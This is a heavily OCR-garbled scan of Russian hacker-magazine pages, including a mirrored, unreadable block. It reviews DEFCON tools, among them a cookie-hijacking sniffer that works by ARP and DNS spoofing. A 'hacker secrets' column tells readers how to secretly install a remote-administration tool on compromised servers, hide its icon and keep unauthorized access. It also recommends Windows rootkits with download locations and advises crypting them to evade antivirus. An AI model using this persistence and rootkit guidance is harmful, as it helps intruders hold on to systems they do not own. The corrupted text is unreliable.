Интерфейс на СИ: для Бгасііз 




> СІѴСІ 

На нашем диске 
ты найдешь образ, 
в котором организа- 
торами конференции 
собраны все пред- 
ставленные утилиты. 




> Ііпкз 

• Отчето посещении 
ОЕРСОЫ’а одного 
из участников: 
ЫБр:/Аллллл/.р2рпеБ 
пеі/зіогу/І 6782 

• Все утилиты 

в одном флаконе: 
ЫБрУ/есІде.і-ЬаскесІ. 
сотАМсопІб-ссІ-ізо- 
розіесі 



05 



СОІШАВРЕАТЕ — ВѴ СНРІ5 
ЕА6І.Е АЫй ТІМ ѴША5 



ПЛАГИН ДЛЯ ША РКО ДЛЯ 
СОВМЕСТНОГО РЕѴЕР5Е 

16 



ЕМ6ШЕЕКШ 
НТТР://ѴѴѴѴѴѴ.тАВООК.СОМ/ 
СОЫ-АВКЕАТЕ 



соІІаЬРЕаІе — это плагин для ЮАРго, позволяющий ЮА- 
реверсерам одновременно «расковыривать» один и тотже 
бинарный файл. СоІІаЬРЕаІе состоит из клиентского плагина, 
который подключается кЮА, начиная с версии 4.9 и до 5.3, 
а также серверной компоненты, использующей БаѵаАЮВС 
и СУБД Роз1:дге5СІС/Му5СІЕ. Когда в любимой ЮА включа- 
ется плагин, она устанавливает соединение с сервером 
соІІаЬРЕаІе. Плагин отслеживает сообщения ЮАо произ- 
веденных действиях, помещая информацию в базу данных 
сервера. Каждоетакое сообщение складывается на сервере и 
дублируется другим пользователям ЮА, работающим над тем 
же самым проектом. Каквидишь, все предельно просто. При- 
чем, любой пользователь может в любой момент отключиться 
или присоединиться заново: у него будет самая последняя 
версия файла и история изменений. Во время работы можно 
создавать так называемые заѵероіпБы — своеобразныеточки 
восстановления, к которым всегда можно вернуться, чтобы 
откатить сомнительные изменения. Такиеточки хранятся на 
сервере, у которого, кстати, есть возможностьуправления 
пользователями — подключиться абы кто к проекту не сможет. 
Зачем это вообще нужно? Если не брать в расчет професси- 
ональных реверсов, то это отличное средство для обуче- 
ния крекингу. Более опытный товарищ может наглядно 



показывать новичку, как и что он делает, каким образом 
лучше поступить в сложившейся ситуации и пр. Правда, 
встроенных средств общения в СоІІаЬРЕаІе нет, но ничего 
не мешаеттебе запустить Зкуре. 



06 



6КЕЫ0ЕІ.5САЫ — ВУ ОАѴІО 
БУРЫЕ 



СКАНЕРУЯЗВИМОСТЕИ 
ВЕБ-ПРИЛОЖЕНИЙ (501 



ІШЕСТІОМ, Х55, С5РР) 
НТТРУ/ОРЕЫОЕЬ-ЗСАЫ.СОМ 



Перед нами кроссплатформенный сканер для поиска уяз- 
вимостей в веб-приложениях. Среди задач разработчики 
обозначили: полную кроссплатформенность, ОШ для всех 
ОС, отсутствие зависимостей (кроме Баѵа), обнаружение и 
использование найденныхуязвимостей. В итоге со всеми 
требованиями у них получилось выпустить довольно уни- 
версальный сканер, включающий: 

• встроенный прокси для перехвата данных; 

• фаззер НТТР-запросов, также собранных полностью вручную; 

• модуль для ЗОБ іщесбоп; 

• СЕБЕ іщесбоп; 

• Сгозз-зБе гециезі: Бэгдегу (С5ПЕ); 

• обнаружение скрытых директорий (Оігесіогу Ігаѵегзаі); 

• модуль для выяснения данных о жертве (обработка РоЬоІз. 
М, ошибоксистемы и т.д.) ; 

• пен-тест конфигурации веб-демона (Сгозз-зіБе ѣгасіпд, 
Ргоху беІесБоп). 

В общем-то, это был бы самый обычный сканнер, если бы не 
реализация некоторых редких видов атак, вроде разновид- 
ности Х55 — сгозз-зБе гедиезі; Бэгдегу. 



► 042 
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йкнЬ: СІІ4Ш ѵ^Л.0 



14№ЫЫЧН ЕЧ м- ш иШ ш 



Клиентская часть Бгасііз 




Выбираем модули для сканирования 




Отдаем команду в СоІІаЬРЕаІе 




ТНЕ МШБІ.ЕК — ВѴ .ІАѴ ВЕАІ.Е 



ПРОГРАММА ДЛЯ ВЗЛОМА 
НЕЗАЩИЩЕННЫХ АККАУН- 
ТОВ НА ВЕБ-СЕРВИСАХ 
НТТР://ѴѴѴѴѴѴ.ШТЕіеиАР0ІАМ5.С0М/ 
ТНЕМШОЬЕР.НТМЬ 



Большая проблема современных веб-сервисов втом, что 
55І_-шифрование используется только во время аутентифи- 
кации. Далее, в целях экономии трафика и увеличения быс- 
тродействия, данные передаются обычному НТТР-каналу со 
всеми вытекающими последствиями. Распознать подобную 
ситуацию несложно. На странице для ввода логина и пароля 
адресная строка выглядит примернотак: 



ТШСрз : / /тт. ііпкесііп . сош/зесиге/1одіп?= . . . 



А после процедуры аутентификации видно, что использует- 
ся обычный НТТР: 



іШСр : //тт. Ііпкесііп. сот/іюше 

Чуешь разницу? Можно попробовать добавить в запрос Ыірз, 
нотолку не выйдет. Сервер все равно возвращается обратно к 
незащищенному соединению, а данные по-прежнему переда- 
ются в открытом виде до тех пор, пока не будет использовано 
какое-нибудь специальное средство (например, ѴРІ\І].Тулзу 



быстро раскрутили какутилитудля угона аккаунтов на Отаіі. 
Правда, уже в августеу почтовой службы Соодіе появилась 
опция для использования защищенного соединения на про- 
тяжении всей работы («Аіѵѵауз изе Ыірз»). Но по этой схеме 
работает множество других популярных сервисов. Взять тот 
же Ыѵе^игпаіили Ыпкіп.Там никакихзащитныхопций нет! 
Посути, мы имеем дело собычным снифером, написанным 
на ПиЬу (исходники открыты] и специально заточенным под 
перехват пользовательских кукисов. Для перехвата трафика 
используются старые обкатанные приемы, вроде АВР-спу- 
финга или подмены ОЫЗ/ОНСРсервера. АсамТЬе МібсНегуже 
сейчас в силах выполнять следующее: 

• клонировать изег-сесии в любом приложении, которое 
использует передачу данных по НТТР; 

• заменять ссылки с использованием безопасного НТТР5 
на НТТР; 

• автоматически пересылать браузер жертвы на сайт 
(эксплоитами на Меіазріоір выполняющимися на стороне 
клиента); 

• автоматически собирать и менять всю приватную инфор- 
мацию ожертве. 

Конечно, это далеко не все утилиты, представленные на 
БЕРСОИ. Но мы постарались отобрать реально полезные и 
применимые на практикетулзы, заведомо обходя вещи чересчур 
уж экзотические. Так или иначе, на дискеты найдешь целую 
подборкуутилит, которую стоит взять на вооружение. НЕ 




> ѵѵагпіпд 

Информация пред- 
ставлена исклю- 
чительно в целях 
ознакомления. 

За использование 
полученных знаний 
в незаконных целях 
ни автор, ни редак- 
ция ответственности 
не несут. Имей этой 
в виду. 
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поігиЬбііпІ ггэлігЬпэпЯ ібэі*эпэ^2 эіігб^отогі бхбЬ 
ггэпЬэтдэ^эЬ ЫогІліэЛіѵ ЬэІбэИрэЯ стон іирпбУ уігбѵѵ 
тгіЛигэІ’іоІбэіШгиіЬпбидпІІ сііву эпо^гэЯііѵѵпэЯэбпЯ 
эіхооѴѴ стон ЬэібдиглІІ у^уг^^эx э^6Ьэ^^л ЬбыО рігіг’шэібглб 
пойбЛидбоэлоИ ггэіэтбО э^допсі стон эѵіэээЬгіЬ б*ШоѴ 
9ІсІ бЬіэіѵѵл У аяоі>І гиолэдіЬбі ЬтИуХгиЬоИ ІгэѵлігіО 
лоі*б.ІЛхэѴіэ*бѵѵ*пэті5гэі*б*іЬбіір ЬэІібэгІлэЬбэі эхідсЛоох 
эіпоІолбѵібѲ эіпотіІЛБІэМ гиопігтиэ’ііЭ ібэітгИугіпэругі 
о>Іэб[і9іоири гіаоИдоніэл гиоіэЛЛѴ эЛісібН іблоіЬбЯ 
у^9тог9^ог^VV л9^^^^6уэіло^6^у^дпо^ лоі^біирілбтолэіМ 
уЛэідпЯ угІролШабт лоіібілігэ іэМигІѵѵ ныдо эгоісіо^бт 
уЛлб^длб іобші лбісіип ггэлэЛсіблібМбпІІ ^6эіг^^9^э^уН 
ггэпэісібіЛ’іэѵгіЛіоігіэло’іа эЛЛугІрогІІлбХтгілшоЬэсІ 
эѵіггэээигпоИ бЬоІбглогёсЛ'вп БгЬпІо’іІгбѲ ігіЫбіэТ 
Ьэѵѵол сі по н піхбпТ гиоІбтоЛірбЯ *эЛэлі8 гпіэЯ ггэіггоЮ 
пбэібгэбэ ЬэпдігпэЬли лбіоорбібЯ э*б*пэтіЬэ2 тгйлбЛ 
гігбсібібО эйбтдиэХ гиог^ютоэпіаугі дпбѴ ѵѵэг^лот 
Ьэ*б^эі*ібпЬбиІЭ ІлэтэдіэѵіО эІбпдбтоЛг^ эЛбЯЬбід 
гиорібэоігбі пэ^6^1г^6т лбЯэгЬ Ьэпіѵѵ біэтб’іІэІоЬиэгр 
тгЫлбсі*ш8 у^бэілшптоЭ поіІбіээгіѵэЬ дпЫпІгпи 
уттбгі тгіѵіЬіээЯ эідброг^іХ эѵэіэІгэУ эЛэбтбЯ 



СЛАБО? 



іээгіѵѵгІгбЬ бгЬбэгіѵэщслІойпбпЗ эШбу поіг^ті 
эбээбпітгбі бад бісіиЗ Обу уЛбтіЛэоИ гѳібЬпуХ 
УІЭО-ІСЛІЭЭІЭ ^ЛОѴѴубѴѴ аТРЗЭД )ёІ ЛОІ дЛІ*6ЭІсПбП0*1бгЭ^ 

эфатэн вад ЛегіисІ гиоуорэѵо ггэпг^оЬп6^эЯ гигЬпугИолэХ 
Ьэ00бп>1 апон Л 6 ПЭЛІПЭ 60 ІатбрэлдпоЭ ібіэіЛіэбгпоИ 
9П0І86І ^туб*г>Ьбсі уЫэіѵѵ нкідо уігігіѵѵоЛбѴѴ эібѵѵпэ^б 
гаэ^Ябіс! пиЬЛу лэхШ^оѴ пойбЬпсіуН эйгеЬсЛоЫ апон 
Э^бОГІЭПІ ПЭЯлиІЭХІЭбІоѴ ЛІ^^9^ біпуЬог^іх ЭбЫпуЛГ^ОуЛЭЭ 
лоппэ* дпігІЯтгЯэоЛ эйгб^оут тгіпбілолээіЭ эЛгІдлбИ 
9^^го^гіЬ лпЫэуатваэд бттбтЬоЭэгиогІдпіІлиоэ 
уЯЛсІбгтоіглб’іІіэІпі іэМэгпбэ8 уЛблоіІб’шдЛлоЭ 
пэіоѵлоИ гігбЬэідлбг^туі дібИ ЬЫуХггэлЫтбэУ 
уэлэирэглоЭ ібэідсЛоэгІІпоИ у^ээиО 9хИбтио[ 
гэйбтопѲ бЬодйгбтооІ дліМэЛ апон уіблгшоЯлэд 
атваэд Ілэтп’іоЬАу'ігИгЬэлугЯэоісІэіиУапонуітоЬоЯ 
ггэпЬлбШбЭ этбіэсі бібэу ІгіМэЬпэѴ Ію^тэН гігілпі 
э^сЛгп6^xэлIуЬ6[тэ^рУэі^о^^оЯг6^6^ Ьіслгіэогііпбх 
бйогісі б^ээбібг ггэЛэѵѵэІпіібіэХЯ’ібтэІбЬэІб^эгліі 
эіігйібіэілі іэрпсЛэсі эІбіІго’іШэтбі Ьо^уЬ 6’18 
біЯіоИ ЯбэіХэЬіШиоУггэпгиоиэ^гпоэлі Ьіопугі^оугІ 
Ьэігідпли ^эиО уірпіЯб9ісіѵѵб[ ібіэтэг^эпоИ лбтЯоі 
бад ^оогігпэсітисі ибѴб[э’шЪпі^огбѴ тоЫэбО эЬіэпіІ 
гіЛЬиоугэібіээіЯ ^тбіг^бгіпопоіэіэгі*дпэі ѵѵоІгэЯ 
эЛэиэіолоігіО ѵѵбгігЯэіЛ гігіуіэпіп атвп іМисітбѴѴ ^іігэпдб 
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Базу Наск} 

Уі^ШііИШЦЮгііМкІШІ Леонид «св@ ѵѵі_ея» исупов 

/ П0Ю@МАІІ..П1І / / СП АѴѴІ.ЕВН АСК@ВАМВІ_ЕК.ВІІ / / КАІГОГЫГЕ@ВК.ВІІ / 




ХАКЕРСКИЕ СЕКРЕТЫ 
ПРОСТЫХ ВЕЩЕЙ 




ЗАДАЧА: 



| НАСТРОИТЬ АНАЛОГ РАДМИНА НАУДАЛ ЕННОМ ДЕДИКЕ 

РЕШЕНИЕ: 



Зачастую в наши хорошие и заботливые руки попадают мощные забугор- 
ныедедики. Каки для чего их можно использовать, полагаю, напоминать 
не нужно. Рано или поздно админ может прикрыть наш доступ ксерверу. 
Чтобы этого не произошло, лучше вовремя позаботиться о резервных 
лазейках в систему. Нетакдавно одним из популярных способов была 
установка радмина и последующее сокрытие его в системе. Но сейчас 
редко кого можно провести подобным маневром. Надежнее будет заюзать 
какой-либо аналог радмина с похожим функционалом. Неплохим вариан- 
том является использованиетулзы НібеАсІппіп. В ее настройке в системе 
есть несколько нюансов, поэтому внимательно изучи алгоритм действий, 
описанный ниже: 



1 . Логинимся на удаленный дедик и сливаем утилу НібеАсІтіп 
с сайта Мбабтіп . ги . 

2 . Запускаем «Пібасігпіп_зебир . ехе» и следуем инструкциям 
инсталлятора . 

3. Запускаем серверную часть приложения на удаленном 
сервере — «Пуск -> Программы -> Ніскіеп АсЗтіпізбгабог 
Нісісіеп Абтіпізбгабог Сервер» и жмем комбинацию клавиш 
<АІГ+Сбг1+Р5> для вызова главного окна сервера. 

4 . При первом старте софтина автоматически указывает не- 
обходимый для работы ІР-адрес. Для ручной настройки ІР- 
адреса просто поставь флажок напротив нужного ІР'ишника. 

5 . В настройках серверной части приложения не забудь ус- 
тановить пароль на соединение с клиентской частью («На- 
стройки» -> «Смена пароля») . 

6. По дефолту, серверная часть программы устанавливается 
в автозагрузку, но при желании режим запуска серверной 



части можно изменить (запуск как системная служба, вмес- 
те с Міпскжз , ручной запуск) . Все это ты можешь сконфигу- 
рировать в разделе «Настройки» -> «Режимы запуска». 

7 . После определения всех настроек желательно скрыть 
иконку приложения из области уведомлений, отметив опцию 
«Скрывать иконку приложения» . 

После настройки сервера, незабудьустановитьсебе клиентскую часть 
софтины. Как видишь, ничего сложного в утиле нет. Кстати, тулза способна 
работать даже на слабеньких машинках, ибосистемныетребованияутилы 
более чем приемлемые: 

• 233 МГц (рекомендуется: 500 МГц или выше) ; 

• 64 МБ НАМ (рекомендуется: 12 8 МБ или выше) ; 

• МісгозоГС Мпскжз 98/МЕ/ЖУ2000/ХР/2003 /Ѵізба; 

• Выход в локальную сеть или в интернет по протоколу 
ТСР/ІР. 

В общем, желаютвоимдедикам долгой и счастливой жизни! :). 
Полноценная замена радмина 





ЗАДАЧА: 



ПОЛУЧИТЬ ПОЛНУЮ ИНФОРМАЦИЮ О СИСТЕМЕ 



РЕШЕНИЕ: 



Какчасто приходится задавать в проге директорию с Виндой или 
временную папку! Это очень часто, кстати, и является ошибкой начи- 



нающего программиста. Данные необходимо получать, а не статически 
вводить. 

Воспользуемся АРІ-шными функциями через С++ и посмотрим, как 
получить наиболее востребованные данные о системе. 

1. Подключаем необходимые заголовки: 

#іпс1ис!е сміпсіомз . Ъ> 

#іпсіисіе <збс1іо.1і> 



► 046 
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2. Объявляем и задаем переменные. 
Размер буфера для вывода (жадничать с 
размером не стоит): 

Меііпе ВВЕЗІ2Е 1024 

Сюда мы будем получать инфу: 

ЬРТЗТК ЗузЕетІпІо; 

ВЖЖВ Виіі = 2 56; 

ТСНАК ЕсЪВиІІег [ВІІЕЗІ2Е] ; 
ЗузЕетІпІо = ЕсЫЗиІІег ; 

3. Итак, подготовка закончена — можно 
приступать. Начнем с имени компьютера: 

СеССотриСегЫате ( ЗузЕетІпІо , 
&Ви11) ; 




В переменной ЗузСешіпІо теперь Простые и полезные вещи... 

находится имя компа в виде текста. Что с ним 
делать дальше (выводить, сохранять и т.п.) 

— оставляю на твое усмотрение. ЕхрапсІЕпѵігоптепЦЗЕгіпдз ( " %03%" , ЗузЕетіпІо , ВЕГРЗІ2Е) ; 

Получаем имя пользователя: 

Не получим никакой дополнительной информации. Например 
СеШзегРІате (ЗузЕетІпІо , &Ви11) ; — «ѴѴіпсІоѵѵз ЫТ». 



Далее — переменная окружения РАТН: 

Не забывай: живем в России, и народлюбитписать русские имена, кото- 
рые лучше дополнительно обработать. Системная директория: ЕхрапсІЕпѵігоптепЦЗЕгіпдз ( "%РАТН%" , ЗузЕетІпІо, 

ВІІЕЗІ2Е) ; 



СеЕЗузЕетВігесЩогу (ЗузЕетІпІо , МАХ_РАТН+1) ; 

И, наконец, полезная папка, куда можно кидать мусор, либо прятать 
Как правило, это ѴѴІ N 00ѴѴЗ\5у5І:епп32, но лучше перестраховаться и инфу: 

получить ее из этой функции. Самая популярная папка: 

ЕхрапсІЕпѵігоптепЦЗЕгіпдз ( " %ТЕМР% " , 

СеШіпйомзВігесЕогу ( ЗузЕетІпІо , МАХ_РАТН+1) ; ЗузЕешІпІо, ВЕГРЗІ2Е) ; 



Далеко не у всех Винда стоит на диске С! Пройдемся по переменным 
окружения. Установленная ось: 



Используя полученную из этих функций информацию, кодер обходит 
стороной кучу проблем. Удачи в начинаниях! 




процессы, поднимать права выполняемых процессов, а также прятать 
события, записываемые в Еѵепі: Ѵіеѵѵег. Админ не узнает из логов ни- 
чего нового о своей системе :]. Работает исключительно потехноло- 



ЗАДАЧА: 



| ПОДОБРАТЬ НАДЕЖНЫЙ РУТКИТДЛЯ ВИНДЫ 

РЕШЕНИЕ: 



Чтобы прочно закрепиться на поломанном виндовом сервере, мало 
одного желания. Нужен еще и хороший инструмент в виде руткита. 
Проблема в том, что большая часть качественной продукции — при- 
ватная, а значит, достать ее нетак просто. Мы пойдем другим путем! 
Выбирать будем из зарекомендовавших себя продуктов, доступных 
всем (ну, или почти всем). Естественно, в этом случае придется при- 
бегнуть к помощи криптера (чтобы антивирус на поломанном сервере 
не поднимал лишнего шума). Но сейчас речь не о том: нас интересует 
только надежный руткитдля Винды! 

1. Специально для тебя я сделал небольшую подборку, изучив 
которую, ты сможешь остановить свой выбор на понравившемся 
продукте: 

• Наскег Ое^епсіег. Один из популярнейших и надежных руткитов 
(зарекомендовал себя на практике). Обладает стандартным набором 
функций и грамотно реализованным алгоритмом работы. Скачиваем 
и знакомимся: хбосиз. пеіАооІз/20040 1/621 .Ы:пп[ . 

• РІІ РооІкіЕ Довольно популярный руткит, умеющий скрывать 



Выбираем руткит 
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гии «Оігесі: Кегпеі ОЬіесІ: МапіриІаІіоп»и не использует стандартные 
функции перехвата АРІ или Сосіе ІщесЛоп. Качаем отсюда: гооікік 
сотА/аиІПЛигеп ор/РЦ Рооікіі.гір . 

• еЕуе ВооіРооЕ Представляет собой І\ЮІ5-бэкдор, реализованный 
по принципу ЬооШвируса. Руткит работает в перехвате тринадцатого 
прерывания и внедрения в загрузчик ѴѴіп б оѵѵз (в момент загрузки с 
диска). Архив лежит здесь: х1юси5.пеіЛоо[5/200509/1 088. Ыті . 

• N1 Рооікіі. Один из древнейших руткитов, не потерявший свою 
актуальность и в наши дни. Живет в системе, ожидает соединения 
на любой порт, а при коннекте выдает консоль. Умеет шифровать 
свой трафик с использованием алгоритма ВІоѵѵбзЬ, прятать свои и 
защищенные объекты (файлы, ключи реестра, службы, еіс): гооІкіЕ 
сотА/аиІпЛигеп орА/ісе.гір . 



№4 

ЕШШобмануть рею таким образом, чтобы он определял 

НИЧЕМ НЕ ЗАПАКОВАННЫЙ ФАЙЛ КАК ФАЙЛ, ПОКРЫТЫЙ ПАКЕ- 
РОМ МОІ.ЕВОХ 
РЕШЕНИЕ: 

Естественно, начинающих реверсеров это может очень запутать, но 
бывалый крякер сразу заподозрит, в чем подвох. Впрочем, от слов кделу. 

1. Запаковываем любую программу Моіебох-ом (я выбрал блокнот). 

2. Открываем запакованную программу отладчиком ОНуОЬд и смотрим на 
точку входа, где располагается следующий код: 

01016253 > $ Е8 00000000 САШ ШТЕРАБ_. 01016258 
01016258 $ 60 РЮЗНАБ 

01016259 . Е8 4Е000000 САШ ШТЕРАБ_. 0101 62АБ 

Выделяем первыетри инструкции и копируем их машинный код при 
помощи «Віпагу Віпагу сору». 

3. Открываем программу, которая будет«обманывать» РЕіб при помощи 
ЕогбРЕ. Нажимаем на кнопку «РЕЕббог» и в поле «ЕпІгуРоіпІ» меняем 
адрес, соответствующий точке входа программы, на адрес области, ко- 
торая не содержит исполняемого кода. Этим адресом, к примеру, может 
быть начало массива нулей, необходимого для выравнивания секции 
(располагается сразу после основного кода секции ЧехД Если ты будешь 
отлаживать программу-дрозофилу, которую можно найти на нашем 
РУР, то меняй адресточки входа на 1026 — именно отсюда и начинается 
массив ноликов. Сохраняй результат нажатием «5аѵе». 



• АРХ Рооікіі 2005. Руткит, основанный на перехвате ѴѴіпбоѵѵз АРІ 
для сокрытия процессов, файлов, ключей реестра и портов. Работает 
в невидимом режиме, скрывая свою собственную папку. Качаем: 
гооЖіЕсотА/аиПЛЬегеаІарИех/АЕХРооІкі^ООб.гір . 

• Не4Ноок. Н еплохой отечественный руткит, обладающий хорошим 
набором функций. Он инсталлится и обеспечиваеттебя удаленной 
консолью, скрывая свои действия в системе. Лежитздесь: ЬИр:// 
уууууу.х(оси5.пе1Лоо[5/200502/993.Ыт[ . 

2. Выбрав руткит, не забудь сконфигурировать его и закриптовать. 
Иначе в ряде случаев результат можеттебя огорчить. 

3. И помни, использование и распространение вредоносных про- 
грамм для ЭВМ карается законом... 

В общем, ты меня понял! :). 



Все эти действия необходимы, чтобы разместить на новой точке входа 
скопированный ранее машинный код сигнатуры пакера МоІеВох. 

4) Открывай программу с измененной ОЕР под отладчиком и смело 
вставляй на новую точку входа код сигнатуры при помощи «Віпагу 
Віпагу разіе». 

5) Необходимо передатьуправление основному коду программы. Для 
этого после кода сигнатуры вбей инструкцию )тр ОЕР (где ОЕР — адрес 
точки входа; в 90% случаев этот адрес будет равен 401000). 

6) Сохраняй измененный файл при помощи команды «Сору Іо ехесиіаЫе 
АИппобібсабопз». 

Теперь можешьсмело проверять модифицированный файл при помощи 
РЕіб. Он лоханулся и показал следующее: «МоІеВох Ѵ2.3Х МоІеЭііібіо. 
сот»! 

Файл ничем незапакован, но РЕіб думает иначе. Жестокий обман! 




№5 

ЩІЩДУВЕЛИЧИТЬ РАЗМЕР ШАРЫ В Р2Р-СЕТИ 

ЖЕ: 

Что нам это даст? С одной стороны, на многих хабах стоитограничение: не 
расшаришь больше 20 гигов — не зайдешь на хаб. С другой, даже простые 
пользователи закрывают доступ ксвоим файлам, раздавая автобаны 
всем, кто мало предоставил своих. Можно, конечно, расшарить сотню ги- 
гов фильмов, но кому-то неохота захламлять винт, а кто-то просто не может 
позволить себе таких объемов. 

Могу предложить два варианта решения. Для примера возьмем популяр- 
ную сеть Оігесі; СоппесЕ 



А) Этот вариант не очень любят админы, поэтому есть вероятность полу- 
чить бан: 

1. Качаем клиентдгеуііпкб.17 или новее. 

2. Шарим сколько нежалко инфы. 

3. Переходим Еііе -> ЭеШпдз 

Ѳепегаі. Ставим галочку возле ЕпаЫе Новоеприменениестарым 
ба к і п д и в поле Абб Ь збаге в метрах функциям 
вбиваем размер шары, которая будет 
добавлена косновной. 

Естественно, она не займет на винте 
ни байта, но и риск спал иться тоже 
велик. 

Б] Есть более мирная и вполне ле- 
гальная альтернатива: 

1. Любы ми подручными средствами 
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создаем файл (либо файлы] нужного размера. Для примера, накидаем 
файл в пол гига, забитый нулями. Париться с Блокнотом не рекомендую, 
таккакон не вывозит и десяти метров. Толи дело старый добрый С++ :]. 

#іпс1исІе <і:збгеат> 

< . . . > 

ЕІЬЕ *1аб_1і1е; 

1аб_1і1е=1ореп( "С: \\ТЕЗТЕІЬЕ" , "а+" ) ; 
бог (іпб 6 = 0; б<= (1024*1024*500) ; б + +) { 
брибз ( " 0 " , 1аС_1і1е) ; 

} 

бсіозе ( 1аС_1і1е) ; 



Подождем пару минут, пока прога не закончит работу, и можно двигаться 
дальше. 

2. В свойствах папки, где лежит этот файл, выбираем «Сжимать содер- 
жимое для экономии места на диске». Применяем ко всем вложенным 
файлам и папкам. 

Ждем несколько минут, пока ужимается файл в директории, и заглядыва- 
ем в его свойства: размер файла 500 Мб, а на диске он же занимает всего 
31 метр (то есть, в 16 раз меньше места). 

3. Шарим папку в своем БС-клиенте и получаем плюс пол гига шары за 31 
метр на винте. 

Таким образом, за 1 Гбзанятого места на винте мы получим 16 Гб рас- 
шареных файлов! И все это — абсолютно легально и безопасно. 



№6 

ПОЛУЧИТЬ КОД, ОПРЕДЕЛЯЮЩИЙ АДРЕС ЦЕЛЕВОЙ 
ИНСТРУКЦИИ И ПОМЕЩАЮЩИЙ ЕГО В РЕГИСТР ПРОЦЕССОРА 
ДЛЯ ПОСЛЕДУЮЩЕГО ИСПОЛЬЗОВАНИЯ В ПРОГРАММЕ 

РЕШЕНИЕ: 

Предлагаю для решения этойтривиальной задачи воспользоваться 
свойствами замечательной процедуры саіі. Мы поместим в стек спе- 
циальный код, который будет определять адрес целевой инструкции, и 
затем передадим этому коду управление. 

Чтобы понять, на чем основывается предложенный метод, необходим 
небольшой экскурс в теорию. 

Если вкратце, инструкция саіі выполняет передачу управления другой 
части программы —также, как и команда перехода Утр) или ее аналоги. 
Единственное отличие — при выполнении данной инструкции происхо- 
дит сохранение адреса команды, следующей сразу за саіі. Такчто, после 
окончания выполнения части кода, вызванной при помощи инструкции 
геі, управление будет возвращено коду, который инициировал вызов. 

Это означает, что для успешного выполнения саіі в общем случае необ- 
ходимо лишь получить адрес возврата в стеке. При выполнении саіі не- 
посредственно перед переходом к вызываемому коду в стек сохраняется 
содержимое регистра ЕІР (который содержит адрес текущей команды]. 
Это достигается путем неявного выполнения команды ризб. Естествен- 
но, для сохранения работоспособности кода необходимо восстановить 
стек — извлечь из него ровно столько байт данных, сколько было в него 
помещено во время выполнения процедуры. Для этих целей и служит 
инструкция возврата (геі). Она принимаетпараметр, указывающий на 
количество байт данных, которые необходимо извлечь из стека. 

Итак, резюмируем полученные сведения: при вызове процедуры на 
вершину стека помещается адрес возврата. То есть, в регистре езр 
должен находиться адрес инструкции, следующей за вызовом. Если в 
теле вызванной процедуры будет выполняться код, который поместит в 
один из регистров значение езр, — мы получим средство для определе- 
ния адреса некоторой инструкции, которая находится следом за саіі-ом. 
Приступим кпрактической части. 

1. Откроем отладчик, подгрузим любую программу для отладки и попро- 
буем написать код, который будет определять адрес инструкции. Дого- 
воримся, что будем помещать адрес целевой инструкции, находящейся 
на вершине стека (указателем на которую является езр], в регистр еах. 
Исполняемые инструкции кода, определяющего адрес, разместим 
в стеке. Немного позже для этого мы напишем окончательный код, 
который и будет отвечать за размещение машинного кода процедуры и 
передачууправления. Вот как выглядит сама процедура: 

шоѵ еах, [езр] 

геб 8; Убираем из стека 8 байт — это размер кода, который 
будет в нем находиться, включая и саму инструкцию геб 



ЗАДАЧА: 



2. Вбиваем этот код в отладчике по любому адресу, выделяем его и 
выбираем из контекстного меню правой кнопки мыши «Сору Віпагу 
сору». Теперь в буфере обмена находится машинный код выделенных 
инструкций. Он выглядиттак: 

8В 04 24 С2 08 00 

Почему мы использовали в нашем коде команду «геі 8», хотя он состоит 
из шести байт? Дело втом, что процессор оперируетдвойными словами, 
состоящими из четырех байт, и при помещении этого машинного кода в 
стекбудет использовано два двойных слова. Код будет дополнен нулями 
справа. Крометого, стоитучесть, что выполняться процессором он будет 
«задом наперед», а это значит, что мы должны его развернуть: 

00 08 с2 24 04 8В 

3. Машинные инструкции получены, осталось написать окончательный 
код, который будет помещать их в стек и передавать им управление. 
Применим команду ризб: 

ризЬ. 08; помещаем в стек первое двойное слово 

ризЬ. 0С224048Ь; помещаем в стек второе двойное слово 

саіі езр; передаем управление на код, размещенный в стеке 

Мы эксплуатировали команду саіі для получения адреса следующей за 
вызовом нашего кода инструкции. Что может быть проще? Единствен- 
ный «подводный камень» — это О ЕР, который теперь встречается все 
чаще и чаще. В нашем случае код, находящийся в стеке, будет безжа- 
лостно зарублен и не получитуправления. Избежать этого можно, заюзав 
функцию ѴігІиаІРгоІесІ. ~тг 

После выполнения кода в регистре еах находится адрес следующей 
инструкции 
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Г Д I ОБЗОР ЭКСПЛОЙТОВ 



КРИС КАСПЕРСКИ 



С НАЧАЛОМ ОСЕНИ ХАКЕРЫ ВЕРНУЛИСЬ ИЗ МЕСТ НЕ СТОЛЬ ОТДАЛЕННЫХ (МОРЕЙ, ЛЕСОВ, 
СТЕПЕЙ И ПРОЧЕЕ). А ТУТ ѲООѲЬЕ ПОДОГНАЛА СВЕЖИЙ БРАУЗЕР СНКОМЕ (ПЕРЕХАЧЕННЫЙ 
РІРЕРОХ), РВУЩИЙ ІЕ, КАК ТУЗИК ГРЕЛКУ (ПО КОЛИЧЕСТВУ ОБНАРУЖЕННЫХ ДЫР). В ЭТО ЖЕ 
ВРЕМЯ КРИС ВЕБЕР ВМЕСТЕ С КРИСОМ КАСПЕРСКИ ОБНАРУЖИЛИ И ОБОСНОВАЛИ ПРИНЦИПИ- 
АЛЬНО НОВЫЙ ТИП АТАК. ОНИ ПРОДЕМОНСТРИРОВАЛИ ЕГО НА ПОДОПЫТНОЙ 51ІЫ МѴА, СОРВАВ 
ЕЙ КРЫШУ НЕОБЫЧНЫМ СТЕКОВЫМ ПЕРЕПОЛНЕНИЕМ. 



60061-Е 

СНКОМЕ 

V I МНОЖЕСТ- 
ВЕННЫЕ УЯЗВИМОСТИ 



» Вгіе* 



Поздравляем! На рынке браузеров 
появился новый игрок— Соодіе 



СЬготе, созданный на базе 
движка изуродованного РігеРох с 
упрощенным интерфейсом, ориен- 
тированным толи на сексуальное 
меньшинство, то ли на интеллек- 
туальное большинство. И, конечно 
же, самым главным козырем в 
продвижении на рынокстала безо- 




Если Ооодіе (согласно слухам] сподобится выпустить свою операционную 
систему, то парни в Місгозоіі: просто обзавидуются, какую же крутую траву ^ 
курят их конкуренты 



пасность. Цитирую официальное 
средство личной гигиены: «Соодіе 
СЬготе — это браузер, обеспечи- 
вающий более удобную, быструю и 
безопасную работу в интернете». 
Такое впечатление, что любой 
вновь созданный программный 
продуктавтоматически объявля- 
ется более безопасным, даже если 
это сырая бета-версия, никем не 
протестированная. За первые 
недели эксплуатации браузера 
хакеры обнаружили в нем десятка 
два дыр, половина из которых кри- 
тическая (допускаетудаленный 
захватуправления с выполнением 
произвольного зЬеІІ-кода]. Все 
ехрІоіТы выложены в открытый 
доступ, но Соодіе по-прежнему 
